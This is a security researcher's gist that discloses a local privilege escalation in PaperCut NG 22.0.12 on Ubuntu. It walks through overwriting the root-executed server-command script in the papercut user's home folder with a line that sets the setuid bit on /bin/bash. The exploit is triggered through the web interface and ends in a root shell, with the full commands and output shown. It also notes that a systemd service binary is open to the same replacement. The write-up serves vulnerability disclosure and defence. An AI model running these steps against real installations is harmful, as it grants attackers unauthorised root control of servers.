@xct

xct/info.md

Last active December 4, 2023 07:46

Papercut Privilege Escalation

Installation

We download the latest version 22.0.12 / Build 66453 from the website (pcng-setup-22.0.12.66454.sh) and install it as a low-privileged user called "papercut" on Ubuntu 22.04. During installation we choose the "su" method and provide the root password.

Exploitation

Assume that, as an attacker, we have access to this low-privileged "papercut" user (for example via SSH or another vulnerability) and that we can also reach the web application on port 9191. Logged in as application admin, we go to http://127.0.0.1:9191/app?service=page/PrintDeploy and follow the assistant on the right side of the screen until we reach the "Mobility Print: Import Printers" screen. There we enter anything in the search field and press "Refresh servers". This runs /bin/sh /home/papercut/server/bin/linux-x64/server-command get-config health.api.key on the machine as root. Since this file lives in the papercut user's directory, we can replace it with any binary or shell script we want.

To execute the attack, run the following commands as the low privileged "papercut" user:

papercut@research:~$ ls -lah /home/papercut/server/bin/linux-x64/
drwxr-xr-x 3 papercut papercut 4,0K Mai 26 13:03 .
drwx------ 3 papercut papercut 4,0K Mai 26 13:03 ..
...
-rwxr-xr-x 1 papercut papercut  493 Mai 12 08:45 server-command
...
papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/sh
#
# (c) Copyright 1999-2013 PaperCut Software International Pty Ltd
#
# A wrapper for server-command
#

. `dirname $0`/.common

export CLASSPATH
${JRE_HOME}/bin/java \
        -Djava.io.tmpdir=${TMP_DIR} \
        -Dserver.home=${SERVER_HOME} \
        -Djava.awt.headless=true \
        -Djava.locale.providers=COMPAT,SPI \
        -Dlog4j.configurationFile=file:${SERVER_HOME}/lib/log4j2-command.properties \
        -Xverify:none \
	biz.papercut.pcng.server.ServerCommand \
	"$@"

papercut@research:~$ mv /home/papercut/server/bin/linux-x64/server-command /home/papercut/server/bin/linux-x64/server-command.bak
papercut@research:~$ echo "#!/bin/bash" > /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ echo 'chmod u+s /bin/bash' >> /home/papercut/server/bin/linux-x64/server-command
papercut@research:~$ chmod +x /home/papercut/server/bin/linux-x64/server-command

papercut@research:~$ cat /home/papercut/server/bin/linux-x64/server-command
#!/bin/bash
chmod u+s /bin/bash

Now that the script has been replaced, it will set the setuid bit on bash when we hit the refresh button. Note that we can do this because the file is in our home directory and is owned by the papercut user (but executed as root).

Confirm root privileges:

papercut@research:~$ ls -lah /bin/bash
-rwsr-xr-x 1 root root 1,4M Jan  6  2022 /bin/bash
papercut@research:~$ bash -p
bash-5.1# id
uid=1001(papercut) gid=1001(papercut) euid=0(root) groups=1001(papercut)

Additional Vulnerabilities

Besides the example above, there are other similar issues with binaries in the papercut home folder being executed as root. For example, the Print Deploy service runs another binary as root from the low-privileged user's home folder:

papercut@research:~$ cat /etc/systemd/system/multi-user.target.wants/pc-print-deploy.service
[Unit]
Description=Automatically deploys printers through a server configuration
ConditionFileIsExecutable=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy

[Service]
StartLimitInterval=5
StartLimitBurst=10
ExecStart=/home/papercut/providers/print-deploy/linux-x64/pc-print-deploy



Restart=always
RestartSec=120

[Install]
WantedBy=multi-user.target

Here the binary can also be replaced in the same way as above, but a service restart is required to trigger it. Other services are also affected.
